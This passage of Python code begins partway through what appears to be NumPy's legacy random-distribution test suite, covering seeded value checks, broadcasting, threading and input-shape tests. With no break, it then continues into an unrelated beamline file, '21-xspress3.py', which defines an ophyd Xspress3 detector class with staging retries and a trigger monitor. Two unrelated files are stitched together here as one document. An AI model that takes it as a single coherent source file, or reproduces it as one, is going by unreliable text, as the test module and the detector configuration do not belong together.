assert_raises(ValueError, random.normal, scale=-0.)
def test_pareto(self):
random.seed(self.seed)
actual = random.pareto(a=.123456789, size=(3, 2))
desired = np.array(
[[2.46852460439034849e+03, 1.41286880810518346e+03],
[5.28287797029485181e+07, 6.57720981047328785e+07],
[1.40840323350391515e+02, 1.98390255135251704e+05]])
# For some reason on 32-bit x86 Ubuntu 12.10 the [1, 0] entry in this
# matrix differs by 24 nulps. Discussion:
# https://mail.python.org/pipermail/numpy-discussion/2012-September/063801.html
# Consensus is that this is probably some gcc quirk that affects
# rounding but not in any important way, so we just use a looser
# tolerance on this test:
np.testing.assert_array_almost_equal_nulp(actual, desired, nulp=30)
def test_poisson(self):
random.seed(self.seed)
actual = random.poisson(lam=.123456789, size=(3, 2))
desired = np.array([[0, 0],
[1, 0],
[0, 0]])
assert_array_equal(actual, desired)
def test_poisson_exceptions(self):
lambig = np.iinfo('l').max
lamneg = -1
assert_raises(ValueError, random.poisson, lamneg)
assert_raises(ValueError, random.poisson, [lamneg] * 10)
assert_raises(ValueError, random.poisson, lambig)
assert_raises(ValueError, random.poisson, [lambig] * 10)
with suppress_warnings() as sup:
sup.record(RuntimeWarning)
assert_raises(ValueError, random.poisson, np.nan)
assert_raises(ValueError, random.poisson, [np.nan] * 10)
def test_power(self):
random.seed(self.seed)
actual = random.power(a=.123456789, size=(3, 2))
desired = np.array([[0.02048932883240791, 0.01424192241128213],
[0.38446073748535298, 0.39499689943484395],
[0.00177699707563439, 0.13115505880863756]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_rayleigh(self):
random.seed(self.seed)
actual = random.rayleigh(scale=10, size=(3, 2))
desired = np.array([[13.8882496494248393, 13.383318339044731],
[20.95413364294492098, 21.08285015800712614],
[11.06066537006854311, 17.35468505778271009]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_rayleigh_0(self):
assert_equal(random.rayleigh(scale=0), 0)
assert_raises(ValueError, random.rayleigh, scale=-0.)
def test_standard_cauchy(self):
random.seed(self.seed)
actual = random.standard_cauchy(size=(3, 2))
desired = np.array([[0.77127660196445336, -6.55601161955910605],
[0.93582023391158309, -2.07479293013759447],
[-4.74601644297011926, 0.18338989290760804]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_exponential(self):
random.seed(self.seed)
actual = random.standard_exponential(size=(3, 2))
desired = np.array([[0.96441739162374596, 0.89556604882105506],
[2.1953785836319808, 2.22243285392490542],
[0.6116915921431676, 1.50592546727413201]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_gamma(self):
random.seed(self.seed)
actual = random.standard_gamma(shape=3, size=(3, 2))
desired = np.array([[5.50841531318455058, 6.62953470301903103],
[5.93988484943779227, 2.31044849402133989],
[7.54838614231317084, 8.012756093271868]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_standard_gamma_0(self):
assert_equal(random.standard_gamma(shape=0), 0)
assert_raises(ValueError, random.standard_gamma, shape=-0.)
def test_standard_normal(self):
random.seed(self.seed)
actual = random.standard_normal(size=(3, 2))
desired = np.array([[1.34016345771863121, 1.73759122771936081],
[1.498988344300628, -0.2286433324536169],
[2.031033998682787, 2.17032494605655257]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_randn_singleton(self):
random.seed(self.seed)
actual = random.randn()
desired = np.array(1.34016345771863121)
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_t(self):
random.seed(self.seed)
actual = random.standard_t(df=10, size=(3, 2))
desired = np.array([[0.97140611862659965, -0.08830486548450577],
[1.36311143689505321, -0.55317463909867071],
[-0.18473749069684214, 0.61181537341755321]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_triangular(self):
random.seed(self.seed)
actual = random.triangular(left=5.12, mode=10.23, right=20.34,
size=(3, 2))
desired = np.array([[12.68117178949215784, 12.4129206149193152],
[16.20131377335158263, 16.25692138747600524],
[11.20400690911820263, 14.4978144835829923]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_uniform(self):
random.seed(self.seed)
actual = random.uniform(low=1.23, high=10.54, size=(3, 2))
desired = np.array([[6.99097932346268003, 6.73801597444323974],
[9.50364421400426274, 9.53130618907631089],
[5.48995325769805476, 8.47493103280052118]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_uniform_range_bounds(self):
fmin = np.finfo('float').min
fmax = np.finfo('float').max
func = random.uniform
assert_raises(OverflowError, func, -np.inf, 0)
assert_raises(OverflowError, func, 0, np.inf)
assert_raises(OverflowError, func, fmin, fmax)
assert_raises(OverflowError, func, [-np.inf], [0])
assert_raises(OverflowError, func, [0], [np.inf])
# (fmax / 1e17) - fmin is within range, so this should not throw
# account for i386 extended precision DBL_MAX / 1e17 + DBL_MAX >
# DBL_MAX by increasing fmin a bit
random.uniform(low=np.nextafter(fmin, 1), high=fmax / 1e17)
def test_scalar_exception_propagation(self):
# Tests that exceptions are correctly propagated in distributions
# when called with objects that throw exceptions when converted to
# scalars.
#
# Regression test for gh: 8865
class ThrowingFloat(np.ndarray):
def __float__(self):
raise TypeError
throwing_float = np.array(1.0).view(ThrowingFloat)
assert_raises(TypeError, random.uniform, throwing_float,
throwing_float)
class ThrowingInteger(np.ndarray):
def __int__(self):
raise TypeError
throwing_int = np.array(1).view(ThrowingInteger)
assert_raises(TypeError, random.hypergeometric, throwing_int, 1, 1)
def test_vonmises(self):
random.seed(self.seed)
actual = random.vonmises(mu=1.23, kappa=1.54, size=(3, 2))
desired = np.array([[2.28567572673902042, 2.89163838442285037],
[0.38198375564286025, 2.57638023113890746],
[1.19153771588353052, 1.83509849681825354]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_vonmises_small(self):
# check infinite loop, gh-4720
random.seed(self.seed)
r = random.vonmises(mu=0., kappa=1.1e-8, size=10**6)
assert_(np.isfinite(r).all())
def test_vonmises_nan(self):
random.seed(self.seed)
r = random.vonmises(mu=0., kappa=np.nan)
assert_(np.isnan(r))
def test_wald(self):
random.seed(self.seed)
actual = random.wald(mean=1.23, scale=1.54, size=(3, 2))
desired = np.array([[3.82935265715889983, 5.13125249184285526],
[0.35045403618358717, 1.50832396872003538],
[0.24124319895843183, 0.22031101461955038]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_weibull(self):
random.seed(self.seed)
actual = random.weibull(a=1.23, size=(3, 2))
desired = np.array([[0.97097342648766727, 0.91422896443565516],
[1.89517770034962929, 1.91414357960479564],
[0.67057783752390987, 1.39494046635066793]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_weibull_0(self):
random.seed(self.seed)
assert_equal(random.weibull(a=0, size=12), np.zeros(12))
assert_raises(ValueError, random.weibull, a=-0.)
def test_zipf(self):
random.seed(self.seed)
actual = random.zipf(a=1.23, size=(3, 2))
desired = np.array([[66, 29],
[1, 1],
[3, 13]])
assert_array_equal(actual, desired)
class TestBroadcast:
# tests that functions that broadcast behave
# correctly when presented with non-scalar arguments
def setup(self):
self.seed = 123456789
def set_seed(self):
random.seed(self.seed)
def test_uniform(self):
low = [0]
high = [1]
uniform = random.uniform
desired = np.array([0.53283302478975902,
0.53413660089041659,
0.50955303552646702])
self.set_seed()
actual = uniform(low * 3, high)
assert_array_almost_equal(actual, desired, decimal=14)
self.set_seed()
actual = uniform(low, high * 3)
assert_array_almost_equal(actual, desired, decimal=14)
def test_normal(self):
loc = [0]
scale = [1]
bad_scale = [-1]
normal = random.normal
desired = np.array([2.2129019979039612,
2.1283977976520019,
1.8417114045748335])
self.set_seed()
actual = normal(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, normal, loc * 3, bad_scale)
self.set_seed()
actual = normal(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, normal, loc, bad_scale * 3)
def test_beta(self):
a = [1]
b = [2]
bad_a = [-1]
bad_b = [-2]
beta = random.beta
desired = np.array([0.19843558305989056,
0.075230336409423643,
0.24976865978980844])
self.set_seed()
actual = beta(a * 3, b)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, beta, bad_a * 3, b)
assert_raises(ValueError, beta, a * 3, bad_b)
self.set_seed()
actual = beta(a, b * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, beta, bad_a, b * 3)
assert_raises(ValueError, beta, a, bad_b * 3)
def test_exponential(self):
scale = [1]
bad_scale = [-1]
exponential = random.exponential
desired = np.array([0.76106853658845242,
0.76386282278691653,
0.71243813125891797])
self.set_seed()
actual = exponential(scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, exponential, bad_scale * 3)
def test_standard_gamma(self):
shape = [1]
bad_shape = [-1]
std_gamma = random.standard_gamma
desired = np.array([0.76106853658845242,
0.76386282278691653,
0.71243813125891797])
self.set_seed()
actual = std_gamma(shape * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, std_gamma, bad_shape * 3)
def test_gamma(self):
shape = [1]
scale = [2]
bad_shape = [-1]
bad_scale = [-2]
gamma = random.gamma
desired = np.array([1.5221370731769048,
1.5277256455738331,
1.4248762625178359])
self.set_seed()
actual = gamma(shape * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gamma, bad_shape * 3, scale)
assert_raises(ValueError, gamma, shape * 3, bad_scale)
self.set_seed()
actual = gamma(shape, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gamma, bad_shape, scale * 3)
assert_raises(ValueError, gamma, shape, bad_scale * 3)
def test_f(self):
dfnum = [1]
dfden = [2]
bad_dfnum = [-1]
bad_dfden = [-2]
f = random.f
desired = np.array([0.80038951638264799,
0.86768719635363512,
2.7251095168386801])
self.set_seed()
actual = f(dfnum * 3, dfden)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, f, bad_dfnum * 3, dfden)
assert_raises(ValueError, f, dfnum * 3, bad_dfden)
self.set_seed()
actual = f(dfnum, dfden * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, f, bad_dfnum, dfden * 3)
assert_raises(ValueError, f, dfnum, bad_dfden * 3)
def test_noncentral_f(self):
dfnum = [2]
dfden = [3]
nonc = [4]
bad_dfnum = [0]
bad_dfden = [-1]
bad_nonc = [-2]
nonc_f = random.noncentral_f
desired = np.array([9.1393943263705211,
13.025456344595602,
8.8018098359100545])
self.set_seed()
actual = nonc_f(dfnum * 3, dfden, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert np.all(np.isnan(nonc_f(dfnum, dfden, [np.nan] * 3)))
assert_raises(ValueError, nonc_f, bad_dfnum * 3, dfden, nonc)
assert_raises(ValueError, nonc_f, dfnum * 3, bad_dfden, nonc)
assert_raises(ValueError, nonc_f, dfnum * 3, dfden, bad_nonc)
self.set_seed()
actual = nonc_f(dfnum, dfden * 3, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_f, bad_dfnum, dfden * 3, nonc)
assert_raises(ValueError, nonc_f, dfnum, bad_dfden * 3, nonc)
assert_raises(ValueError, nonc_f, dfnum, dfden * 3, bad_nonc)
self.set_seed()
actual = nonc_f(dfnum, dfden, nonc * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_f, bad_dfnum, dfden, nonc * 3)
assert_raises(ValueError, nonc_f, dfnum, bad_dfden, nonc * 3)
assert_raises(ValueError, nonc_f, dfnum, dfden, bad_nonc * 3)
def test_noncentral_f_small_df(self):
self.set_seed()
desired = np.array([6.869638627492048, 0.785880199263955])
actual = random.noncentral_f(0.9, 0.9, 2, size=2)
assert_array_almost_equal(actual, desired, decimal=14)
def test_chisquare(self):
df = [1]
bad_df = [-1]
chisquare = random.chisquare
desired = np.array([0.57022801133088286,
0.51947702108840776,
0.1320969254923558])
self.set_seed()
actual = chisquare(df * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, chisquare, bad_df * 3)
def test_noncentral_chisquare(self):
df = [1]
nonc = [2]
bad_df = [-1]
bad_nonc = [-2]
nonc_chi = random.noncentral_chisquare
desired = np.array([9.0015599467913763,
4.5804135049718742,
6.0872302432834564])
self.set_seed()
actual = nonc_chi(df * 3, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_chi, bad_df * 3, nonc)
assert_raises(ValueError, nonc_chi, df * 3, bad_nonc)
self.set_seed()
actual = nonc_chi(df, nonc * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_chi, bad_df, nonc * 3)
assert_raises(ValueError, nonc_chi, df, bad_nonc * 3)
def test_standard_t(self):
df = [1]
bad_df = [-1]
t = random.standard_t
desired = np.array([3.0702872575217643,
5.8560725167361607,
1.0274791436474273])
self.set_seed()
actual = t(df * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, t, bad_df * 3)
assert_raises(ValueError, random.standard_t, bad_df * 3)
def test_vonmises(self):
mu = [2]
kappa = [1]
bad_kappa = [-1]
vonmises = random.vonmises
desired = np.array([2.9883443664201312,
-2.7064099483995943,
-1.8672476700665914])
self.set_seed()
actual = vonmises(mu * 3, kappa)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, vonmises, mu * 3, bad_kappa)
self.set_seed()
actual = vonmises(mu, kappa * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, vonmises, mu, bad_kappa * 3)
def test_pareto(self):
a = [1]
bad_a = [-1]
pareto = random.pareto
desired = np.array([1.1405622680198362,
1.1465519762044529,
1.0389564467453547])
self.set_seed()
actual = pareto(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, pareto, bad_a * 3)
assert_raises(ValueError, random.pareto, bad_a * 3)
def test_weibull(self):
a = [1]
bad_a = [-1]
weibull = random.weibull
desired = np.array([0.76106853658845242,
0.76386282278691653,
0.71243813125891797])
self.set_seed()
actual = weibull(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, weibull, bad_a * 3)
assert_raises(ValueError, random.weibull, bad_a * 3)
def test_power(self):
a = [1]
bad_a = [-1]
power = random.power
desired = np.array([0.53283302478975902,
0.53413660089041659,
0.50955303552646702])
self.set_seed()
actual = power(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, power, bad_a * 3)
assert_raises(ValueError, random.power, bad_a * 3)
def test_laplace(self):
loc = [0]
scale = [1]
bad_scale = [-1]
laplace = random.laplace
desired = np.array([0.067921356028507157,
0.070715642226971326,
0.019290950698972624])
self.set_seed()
actual = laplace(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, laplace, loc * 3, bad_scale)
self.set_seed()
actual = laplace(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, laplace, loc, bad_scale * 3)
def test_gumbel(self):
loc = [0]
scale = [1]
bad_scale = [-1]
gumbel = random.gumbel
desired = np.array([0.2730318639556768,
0.26936705726291116,
0.33906220393037939])
self.set_seed()
actual = gumbel(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gumbel, loc * 3, bad_scale)
self.set_seed()
actual = gumbel(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gumbel, loc, bad_scale * 3)
def test_logistic(self):
loc = [0]
scale = [1]
bad_scale = [-1]
logistic = random.logistic
desired = np.array([0.13152135837586171,
0.13675915696285773,
0.038216792802833396])
self.set_seed()
actual = logistic(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, logistic, loc * 3, bad_scale)
self.set_seed()
actual = logistic(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, logistic, loc, bad_scale * 3)
assert_equal(random.logistic(1.0, 0.0), 1.0)
def test_lognormal(self):
mean = [0]
sigma = [1]
bad_sigma = [-1]
lognormal = random.lognormal
desired = np.array([9.1422086044848427,
8.4013952870126261,
6.3073234116578671])
self.set_seed()
actual = lognormal(mean * 3, sigma)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, lognormal, mean * 3, bad_sigma)
assert_raises(ValueError, random.lognormal, mean * 3, bad_sigma)
self.set_seed()
actual = lognormal(mean, sigma * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, lognormal, mean, bad_sigma * 3)
assert_raises(ValueError, random.lognormal, mean, bad_sigma * 3)
def test_rayleigh(self):
scale = [1]
bad_scale = [-1]
rayleigh = random.rayleigh
desired = np.array([1.2337491937897689,
1.2360119924878694,
1.1936818095781789])
self.set_seed()
actual = rayleigh(scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, rayleigh, bad_scale * 3)
def test_wald(self):
mean = [0.5]
scale = [1]
bad_mean = [0]
bad_scale = [-2]
wald = random.wald
desired = np.array([0.11873681120271318,
0.12450084820795027,
0.9096122728408238])
self.set_seed()
actual = wald(mean * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, wald, bad_mean * 3, scale)
assert_raises(ValueError, wald, mean * 3, bad_scale)
assert_raises(ValueError, random.wald, bad_mean * 3, scale)
assert_raises(ValueError, random.wald, mean * 3, bad_scale)
self.set_seed()
actual = wald(mean, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, wald, bad_mean, scale * 3)
assert_raises(ValueError, wald, mean, bad_scale * 3)
assert_raises(ValueError, wald, 0.0, 1)
assert_raises(ValueError, wald, 0.5, 0.0)
def test_triangular(self):
left = [1]
right = [3]
mode = [2]
bad_left_one = [3]
bad_mode_one = [4]
bad_left_two, bad_mode_two = right * 2
triangular = random.triangular
desired = np.array([2.03339048710429,
2.0347400359389356,
2.0095991069536208])
self.set_seed()
actual = triangular(left * 3, mode, right)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one * 3, mode, right)
assert_raises(ValueError, triangular, left * 3, bad_mode_one, right)
assert_raises(ValueError, triangular, bad_left_two * 3, bad_mode_two,
right)
self.set_seed()
actual = triangular(left, mode * 3, right)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one, mode * 3, right)
assert_raises(ValueError, triangular, left, bad_mode_one * 3, right)
assert_raises(ValueError, triangular, bad_left_two, bad_mode_two * 3,
right)
self.set_seed()
actual = triangular(left, mode, right * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one, mode, right * 3)
assert_raises(ValueError, triangular, left, bad_mode_one, right * 3)
assert_raises(ValueError, triangular, bad_left_two, bad_mode_two,
right * 3)
assert_raises(ValueError, triangular, 10., 0., 20.)
assert_raises(ValueError, triangular, 10., 25., 20.)
assert_raises(ValueError, triangular, 10., 10., 10.)
def test_binomial(self):
n = [1]
p = [0.5]
bad_n = [-1]
bad_p_one = [-1]
bad_p_two = [1.5]
binom = random.binomial
desired = np.array([1, 1, 1])
self.set_seed()
actual = binom(n * 3, p)
assert_array_equal(actual, desired)
assert_raises(ValueError, binom, bad_n * 3, p)
assert_raises(ValueError, binom, n * 3, bad_p_one)
assert_raises(ValueError, binom, n * 3, bad_p_two)
self.set_seed()
actual = binom(n, p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, binom, bad_n, p * 3)
assert_raises(ValueError, binom, n, bad_p_one * 3)
assert_raises(ValueError, binom, n, bad_p_two * 3)
def test_negative_binomial(self):
n = [1]
p = [0.5]
bad_n = [-1]
bad_p_one = [-1]
bad_p_two = [1.5]
neg_binom = random.negative_binomial
desired = np.array([1, 0, 1])
self.set_seed()
actual = neg_binom(n * 3, p)
assert_array_equal(actual, desired)
assert_raises(ValueError, neg_binom, bad_n * 3, p)
assert_raises(ValueError, neg_binom, n * 3, bad_p_one)
assert_raises(ValueError, neg_binom, n * 3, bad_p_two)
self.set_seed()
actual = neg_binom(n, p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, neg_binom, bad_n, p * 3)
assert_raises(ValueError, neg_binom, n, bad_p_one * 3)
assert_raises(ValueError, neg_binom, n, bad_p_two * 3)
def test_poisson(self):
max_lam = random.RandomState()._poisson_lam_max
lam = [1]
bad_lam_one = [-1]
bad_lam_two = [max_lam * 2]
poisson = random.poisson
desired = np.array([1, 1, 0])
self.set_seed()
actual = poisson(lam * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, poisson, bad_lam_one * 3)
assert_raises(ValueError, poisson, bad_lam_two * 3)
def test_zipf(self):
a = [2]
bad_a = [0]
zipf = random.zipf
desired = np.array([2, 2, 1])
self.set_seed()
actual = zipf(a * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, zipf, bad_a * 3)
with np.errstate(invalid='ignore'):
assert_raises(ValueError, zipf, np.nan)
assert_raises(ValueError, zipf, [0, 0, np.nan])
def test_geometric(self):
p = [0.5]
bad_p_one = [-1]
bad_p_two = [1.5]
geom = random.geometric
desired = np.array([2, 2, 2])
self.set_seed()
actual = geom(p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, geom, bad_p_one * 3)
assert_raises(ValueError, geom, bad_p_two * 3)
def test_hypergeometric(self):
ngood = [1]
nbad = [2]
nsample = [2]
bad_ngood = [-1]
bad_nbad = [-2]
bad_nsample_one = [0]
bad_nsample_two = [4]
hypergeom = random.hypergeometric
desired = np.array([1, 1, 1])
self.set_seed()
actual = hypergeom(ngood * 3, nbad, nsample)
assert_array_equal(actual, desired)
assert_raises(ValueError, hypergeom, bad_ngood * 3, nbad, nsample)
assert_raises(ValueError, hypergeom, ngood * 3, bad_nbad, nsample)
assert_raises(ValueError, hypergeom, ngood * 3, nbad, bad_nsample_one)
assert_raises(ValueError, hypergeom, ngood * 3, nbad, bad_nsample_two)
self.set_seed()
actual = hypergeom(ngood, nbad * 3, nsample)
assert_array_equal(actual, desired)
assert_raises(ValueError, hypergeom, bad_ngood, nbad * 3, nsample)
assert_raises(ValueError, hypergeom, ngood, bad_nbad * 3, nsample)
assert_raises(ValueError, hypergeom, ngood, nbad * 3, bad_nsample_one)
assert_raises(ValueError, hypergeom, ngood, nbad * 3, bad_nsample_two)
self.set_seed()
actual = hypergeom(ngood, nbad, nsample * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, hypergeom, bad_ngood, nbad, nsample * 3)
assert_raises(ValueError, hypergeom, ngood, bad_nbad, nsample * 3)
assert_raises(ValueError, hypergeom, ngood, nbad, bad_nsample_one * 3)
assert_raises(ValueError, hypergeom, ngood, nbad, bad_nsample_two * 3)
assert_raises(ValueError, hypergeom, -1, 10, 20)
assert_raises(ValueError, hypergeom, 10, -1, 20)
assert_raises(ValueError, hypergeom, 10, 10, 0)
assert_raises(ValueError, hypergeom, 10, 10, 25)
def test_logseries(self):
p = [0.5]
bad_p_one = [2]
bad_p_two = [-1]
logseries = random.logseries
desired = np.array([1, 1, 1])
self.set_seed()
actual = logseries(p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, logseries, bad_p_one * 3)
assert_raises(ValueError, logseries, bad_p_two * 3)
class TestThread:
# make sure each state produces the same sequence even in threads
def setup(self):
self.seeds = range(4)
def check_function(self, function, sz):
from threading import Thread
out1 = np.empty((len(self.seeds),) + sz)
out2 = np.empty((len(self.seeds),) + sz)
# threaded generation
t = [Thread(target=function, args=(random.RandomState(s), o))
for s, o in zip(self.seeds, out1)]
[x.start() for x in t]
[x.join() for x in t]
        # the same sequence, generated serially
for s, o in zip(self.seeds, out2):
function(random.RandomState(s), o)
# these platforms change x87 fpu precision mode in threads
if np.intp().dtype.itemsize == 4 and sys.platform == "win32":
assert_array_almost_equal(out1, out2)
else:
assert_array_equal(out1, out2)
def test_normal(self):
def gen_random(state, out):
out[...] = state.normal(size=10000)
self.check_function(gen_random, sz=(10000,))
def test_exp(self):
def gen_random(state, out):
out[...] = state.exponential(scale=np.ones((100, 1000)))
self.check_function(gen_random, sz=(100, 1000))
def test_multinomial(self):
def gen_random(state, out):
out[...] = state.multinomial(10, [1 / 6.] * 6, size=10000)
self.check_function(gen_random, sz=(10000, 6))
# See Issue #4263
class TestSingleEltArrayInput:
def setup(self):
self.argOne = np.array([2])
self.argTwo = np.array([3])
self.argThree = np.array([4])
self.tgtShape = (1,)
def test_one_arg_funcs(self):
funcs = (random.exponential, random.standard_gamma,
random.chisquare, random.standard_t,
random.pareto, random.weibull,
random.power, random.rayleigh,
random.poisson, random.zipf,
random.geometric, random.logseries)
probfuncs = (random.geometric, random.logseries)
for func in funcs:
if func in probfuncs: # p < 1.0
out = func(np.array([0.5]))
else:
out = func(self.argOne)
assert_equal(out.shape, self.tgtShape)
def test_two_arg_funcs(self):
funcs = (random.uniform, random.normal,
random.beta, random.gamma,
random.f, random.noncentral_chisquare,
random.vonmises, random.laplace,
random.gumbel, random.logistic,
random.lognormal, random.wald,
random.binomial, random.negative_binomial)
probfuncs = (random.binomial, random.negative_binomial)
for func in funcs:
if func in probfuncs: # p <= 1
argTwo = np.array([0.5])
else:
argTwo = self.argTwo
out = func(self.argOne, argTwo)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne[0], argTwo)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne, argTwo[0])
assert_equal(out.shape, self.tgtShape)
def test_three_arg_funcs(self):
funcs = [random.noncentral_f, random.triangular,
random.hypergeometric]
for func in funcs:
out = func(self.argOne, self.argTwo, self.argThree)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne[0], self.argTwo, self.argThree)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne, self.argTwo[0], self.argThree)
assert_equal(out.shape, self.tgtShape)
# Ensure returned array dtype is correct for platform
def test_integer_dtype(int_func):
random.seed(123456789)
fname, args, sha256 = int_func
f = getattr(random, fname)
actual = f(*args, size=2)
assert_(actual.dtype == np.dtype('l'))
def test_integer_repeat(int_func):
random.seed(123456789)
fname, args, sha256 = int_func
f = getattr(random, fname)
val = f(*args, size=1000000)
if sys.byteorder != 'little':
val = val.byteswap()
res = hashlib.sha256(val.view(np.int8)).hexdigest()
assert_(res == sha256)
def test_broadcast_size_error():
# GH-16833
with pytest.raises(ValueError):
random.binomial(1, [0.3, 0.7], size=(2, 1))
with pytest.raises(ValueError):
random.binomial([1, 2], 0.3, size=(2, 1))
with pytest.raises(ValueError):
random.binomial([1, 2], [0.3, 0.7], size=(2, 1))
21-xspress3.py
from ophyd.device import (Component as Cpt)
from hxntools.detectors.xspress3 import (Xspress3FileStore,
Xspress3Channel)
from hxntools.detectors.hxn_xspress3 import HxnXspress3DetectorBase
import itertools
import threading
from ophyd import DeviceStatus
class HxnXspress3Detector(HxnXspress3DetectorBase):
channel1 = Cpt(Xspress3Channel, 'C1_', channel_num=1)
channel2 = Cpt(Xspress3Channel, 'C2_', channel_num=2)
channel3 = Cpt(Xspress3Channel, 'C3_', channel_num=3)
# Currently only using three channels. Uncomment these to enable more
# channels:
    # channel4 = Cpt(Xspress3Channel, 'C4_', channel_num=4)
    # channel5 = Cpt(Xspress3Channel, 'C5_', channel_num=5)
    # channel6 = Cpt(Xspress3Channel, 'C6_', channel_num=6)
    # channel7 = Cpt(Xspress3Channel, 'C7_', channel_num=7)
    # channel8 = Cpt(Xspress3Channel, 'C8_', channel_num=8)
hdf5 = Cpt(Xspress3FileStore, 'HDF5:',
write_path_template='/data/%Y/%m/%d/',
mds_key_format='xspress3_ch{chan}',
reg=db.reg,
root='/data',
)
def __init__(self, prefix, *, configuration_attrs=None, read_attrs=None,
**kwargs):
if configuration_attrs is None:
configuration_attrs = ['external_trig', 'total_points',
'spectra_per_point']
if read_attrs is None:
read_attrs = ['channel1', 'channel2', 'channel3', 'hdf5']
super().__init__(prefix, configuration_attrs=configuration_attrs,
read_attrs=read_attrs, **kwargs)
self._dispatch_cid = None
self._spec_saved = threading.Event()
def stage(self, *args, **kwargs):
for j in itertools.count():
try:
ret = super().stage(*args, **kwargs)
except TimeoutError:
N_try = 20
                if j < N_try:
                    print(f"failed to stage on attempt {j}/{N_try}, may try again")
continue
else:
raise
else:
break
# clear any existing callback
if self._dispatch_cid is not None:
self.hdf5.num_captured.unsubscribe(self._dispatch_cid)
self._dispatch_cid = None
# always install the callback
def _handle_spectrum_capture(old_value, value, timestamp, **kwargs):
            # if we get called while in fly mode, unsubscribe ourselves and bail:
            # the fly scan takes care of this itself, but it does not tell us that
            # we are in fly mode until after we are staged
if self.mode_settings.scan_type.get() != 'step':
if self._dispatch_cid is not None:
self.hdf5.num_captured.unsubscribe(self._dispatch_cid)
self._dispatch_cid = None
return
# grab the time and the previous value from the callback payload
trigger_time = timestamp
self._abs_trigger_count = old_value
# dispatch for all of the channels
for sn in self.read_attrs:
if sn.startswith('channel') and '.' not in sn:
ch = getattr(self, sn)
self.dispatch(ch.name, trigger_time)
self._abs_trigger_count = value
self._spec_saved.set()
# do the actual subscribe
self._dispatch_cid = self.hdf5.num_captured.subscribe(
_handle_spectrum_capture,
run=False)
return ret
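    # Note on the trigger flow below: for step scans trigger() hands back a
    # DeviceStatus and a small monitor thread marks it finished (success or
    # failure) once _spec_saved is set or the 60 s wait times out;
    # _handle_spectrum_capture(), installed in stage(), sets that event each
    # time the HDF5 plugin reports another captured frame. For fly scans the
    # status is returned already completed.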
def trigger(self):
self.sts = sts = DeviceStatus(self)
        # for non-step scans, just return an already-finished status object
if self.mode_settings.scan_type.get() != 'step':
sts._finished()
return sts
        s = self.trigger_internal()  # IS THIS THE CORRECT WAY TO TRIGGER ACQUISITION?
self._spec_saved.clear()
def monitor():
success = self._spec_saved.wait(60)
sts._finished(success=success)
# hold a ref for gc reasons
self._th = threading.Thread(target=monitor)
self._th.start()
return sts
